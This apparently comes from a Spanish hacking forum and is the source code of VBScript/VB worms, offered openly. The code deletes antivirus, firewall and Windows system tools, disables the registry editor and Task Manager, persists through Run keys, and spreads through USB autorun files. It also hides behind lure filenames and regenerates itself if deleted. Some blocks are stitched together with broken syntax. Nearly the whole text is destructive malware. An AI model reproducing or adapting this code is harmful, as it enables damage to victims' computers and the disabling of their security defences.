Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"


'otra opción de copiado es la siguiente:
'FileCopy App.Path & App.VBSName & ".vbs", "E:\services.vbs"

'Ahora vamos a marcar nuestro dominio

Set Worm = CreateObject("WScript.Shell")
Worm.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.elhacker.net"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"

'comprimiendo el wormet
Shell Winzip & "-a C:\porno.zip" & "C:\Windows\System\services.vbs" 'comprimir el virus

'para extraer:
'Shell Winzip & "-e C:\porno.zip" &"C:\"

'infectando RARs:
Shell winrar & "a C:\confidencial.zip C:\WINDOWS\System\services.vbs"
Shell winrar & "a C:\passwords.rar C:\WINDOWS\System\services.vbs"

Sub Main() 'motor de búsqueda en infección:
On Error Resume Next
If HayExcel Or HayWord Then
Fso.CopyFile MiNombreVBS, "F:\Abril Lavigne Desnuda.jpeg.vbs"
Fso.CopyFile DirWin & "Web\Folder.htt", "F:\Folder.htt", True
Fso.CopyFile DirWin & "Web\Desktop.ini", "F:\Desktop.ini", True
SetAttr "F:\Abril Lavigne Desnuda.jpeg", vbReadOnly
SetAttr "F:\Desktop.ini", vbHidden
SetAttr "F:\Folder.htt", vbHidden
End If
End Sub

'infectando archivos de excel:

Function HayExcel() As Boolean
Dim ExcelObj As Object
On Error GoTo NoExcel
Set ExcelObj = GetObject(, "Excel.Application")
If ExcelObj.ActiveWorkbook.Path = "F:\" Then
HayExcel = True
Exit Function
End If
NoExcel:
HayExcel = False
End Function

Sub Main() 'Ahora un pequeño PayLoad
If (Month(Now) = 6 or Month(Now) > 6) And (Day(Now) = 13 or Day(Now) < 13) Then
MsgBox "Ándate con ojo porque dije que vendría y he venido", vbCritical, "Marca del Corruptor"
MsgBox "Estás en mis manos... ¿quieres verlo?", vbExclamation, "Marca del Corruptor"
MsgBox "DAME EL PaWeRrR!!!", vbExclamation, "Marca del Corruptor"
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub

Sub Main()
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "Has tenido suerte, mi amo ha querido que te respete. Dale gracias", vbExclamation, "El Perro Fiero de San Pancracio"
End If
If Num = 1 Then
MsgBox "Algo has hecho para merecer la ira de mi amo. Hoy la suerte te ha abandonado.", vbExclamation, "El Perro Fiero"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
Kill "C:\WINDOWS\System32\taskmgr.exe" 'esto borra el administrador de tareas
Kill "C:\WINDOWS\Taskman.EXE" 'por si acaso, que no me fío
Kill "C:\WINDOWS\System32\cmd.exe" 'esto elimina la opción de usar el MS-Dos
Kill "C:\WINDOWS\regedit.exe" 'esto borra el editor del registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
Kill "C:\WINDOWS\System32\command.com" 'esto borra la otra opción de usar el MS-Dos
End If
End Sub

Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function


Bueno, de hecho son dos códigos:

Código (vb) [Seleccionar]
'@echo off by Eliphas & Nehekara. Añoranza del Valhalla.
'por la gloria del Larisel IV, ahora y siempre
'Especiales agradecimientos a Octalh y a Hendrix


App.Taskvisible = False
MsgBox "Por fin nos hemos encontrado tú y yo.", vbExclamation, "Cherubael dice:"
MsgBox "Sabrías que vendría y he venido.", vbExclamation, "Cherubael dice:"
MsgBox "Nehekara no perdona los agravios recibidos.", vbExclamation, "Cherubael dice:"
MsgBox "A sí que ahora afronta las consecuencias.", vbExclamation, "Cherubael dice:"
MsgBox "Quod Erat Demostrandum...", vbExclamation, "Cherubael dice:"
MsgBox "Todas las almas claman por su salvación.", vbExclamation, "Cherubael dice:"
MsgBox "DAME EL PaWeRrR!!!", vbCritical, "Cherubael dice:"

Sub Main()
On Error Resume Next
If Month(Now) = 12 And Day(Now) = 17 Then
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub

Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogon.exe d/ C:\WINDOWS\System\winlogon.exe" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"


Sub Main() 'Dejando nuestra marca
On Error Resume Next
Set Cherubael = CreateObject("WScript.Shell")
Cherubael.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.CherubaeL.com.ar"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
End Sub

Sub Main()
On Error Resume Next
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "A pesar de todo, voy a apiadarme de tí. SOnríe, eres libre.", vbExclamation, "Cherubael dice:"
End If
If Num = 1 Then
MsgBox "Lo siento, pero debo cumplir mis órdenes. Hoy la suerte te ha abandonado.", vbExclamation, "Cherubael dice:"
Kill "C:\WINDOWS\System32\taskmgr.exe"
Kill "C:\WINDOWS\Taskman.EXE"
Kill "C:\WINDOWS\System32\cmd.exe"
Kill "C:\WINDOWS\regedit.exe"
Kill "C:\WINDOWS\System32\wscui.cpl"
Kill "C:\WINDOWS\System32\command.com"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" 'hala!! a tomar por culo el office...
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
End If
End Sub


'[  MODELO DE OBJETOS ]

Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
Set WshShell = wscript.CreateObject("WScript.Shell") ' REGISTRO




'[  CONSTANTES  ]

GUSANETname = wscript.ScriptName ' Indicamos que el nombre del GUSANET sera
                              ' el que tenga en ese momento el archivo actual.
GUSANET = "GUSANET.vbs"
'Nombre del exe que tendra el GUSANET en el sistema

GUSANETpatch = fso.GetSpecialFolder(1) & "\" & GUSANET
'Indicamos el directorio donde se copiara el GUSANET, si utilizamos
'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
'sin importar donde se encuentre.

autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
'lo mismo que en GUSANETpatch pero para el autorrun.

GUSANETusb = ":\proyecto.exe" ' Nombre que tendra el GUSANET en el medio extraible

autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible

Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante


'[  CHEQUEO DE INFECCION  ]

If Not infeccion(GUSANET) Then
copiar GUSANETname, GUSANETpatch
End If


' +  INFECTAR REGISTRO DE WINDOWS  +


If Not keyexist("GUSANET", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\") Then
crearentradareg()

'Si no existe la llave en el registro llamada GUSANET entonces la crea, con esto aseguramos
'el arranque del GUSANET con cada inicio del sistema.



'Subproceso que se encarga crear un archivo y escribir datos en el
'en este caso le indicamos que cree un archivo con la constante autorun
'que definimos desde el principio

Sub makeautorun()
    On Error Resume Next
Set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
    mkaut.WriteLine "[AUTORUN]"                'la constante autorun
    mkaut.WriteLine "open=" & GUSANETusb 'constante del nombre del ejecutable.
    mkaut.WriteLine "shell\1=abrir"
    mkaut.WriteLine "shell\1\Command=" & GUSANETusb
    mkaut.WriteLine "shell\2\=explorar"
    mkaut.WriteLine "shell\2\Command=" & GUSANETusb
    mkaut.WriteLine "shellexecute=" & GUSANETusb
    mkaut.Close
End Sub
'aqui creamos el autorun que sirve para ejecutar el GUSANET cuando el pardillo haga doble click
'en el icono de la unidad extraible


'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
'a cada archivo que compone al GUSANET

Sub makeatributos()
    On Error Resume Next
Dim archivosGUSANET(1) 'array archivosGUSANET que dentro de el contiene al GUSANET y su autorun
    archivosGUSANET(0) = GUSANETpatch
    archivosGUSANET(1) = autorun

       For Each file In archivosGUSANET ' por cada archivo dentro del array archivosGUSANET
         Set wormcontent = fso.GetFile(file) 'tomalos y
            wormcontent.Attributes = 7        'agregales atributos
              Next
End Sub


'Funcion que se encarga de verificar que exista una llave en el registro

Function keyexist(keyname, keyPath, regCategory)
    On Error Resume Next
     retVal = False
     strComputer = "." 'inicamos en cualquier computadora
     Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv") 'se crea un objeto

     oReg.EnumKey regCategory, keyPath, arrSubKeys 'partes de la clave del registro

     For Each subkey In arrSubKeys
          If keyname = subkey Then
               retVal = True
               Exit For
          End If
     Next
     keyExists = retVal
End Function
'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
'llave a verficar


'Subproceso que se encarga de crear la llave en el registro
Private Sub crearentradareg()
    On Error Resume Next
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GUSANET", _
GUSANETpatch, "REG_SZ"
End Sub


'Subproceso que se encarga de copiar al GUSANET a una unidad extraible.
Private Sub infekusb()
    On Error Resume Next
Const DriveTypeRemovable = 1 ' indicamos medio extraible
Do ' inicia loop infinito
Set oFS = wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los drivers
For Each Drive In oDrives 'por cada driver
    If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
        If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
            If fso.fileexists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
               Set cFile = fso.GetFile(Drive.DriveLetter + autorunusb) 'tomalo y
               cFile.Attributes = 0 ' quitale los atributos
               fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True 'despues copialo
           Else ' de lo contrario
      fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True ' copialo
   End If
fso.CopyFile GUSANETpatch, Drive.DriveLetter & GUSANETusb, True ' copia el GUSANET a la unidad
End If
End If
Next
Loop
End Sub


Sub Main()
On Error Resume Next
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
End Sub


Function Antidelete()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function


Basado en código de Hendrix y Octalh